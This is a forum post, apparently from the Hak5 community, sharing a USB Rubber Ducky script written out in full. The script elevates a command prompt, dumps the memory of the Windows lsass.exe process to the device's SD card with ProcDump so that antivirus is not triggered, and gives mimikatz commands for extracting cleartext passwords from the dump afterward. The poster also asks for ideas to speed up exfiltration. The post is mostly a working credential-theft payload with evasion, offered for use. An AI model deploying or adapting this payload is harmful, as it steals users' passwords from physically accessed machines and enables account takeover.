Darren Kitchen
Posted August 31, 2013

Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/

This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe. While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus.

Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the Twin Duck and the largish filesize of the .dmp (42 MB on my system), would it be possible to save it locally, then "grep" the important (smaller?) bits out before transferring them over?

```
REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card.
REM Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass: open an elevated cmd.exe and accept the UAC prompt ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck% (first token of the wmic row whose label is DUCKY) ***
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card and save log file to disk ***
REM -ma writes a full memory dump, which is what sekurlsa::minidump expects
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
ENTER

REM *** GTFO (typed into the console buffer; runs once procdump returns) ***
STRING exit
ENTER

REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz for your target's architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>
```

I'm also curious if a PowerShell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1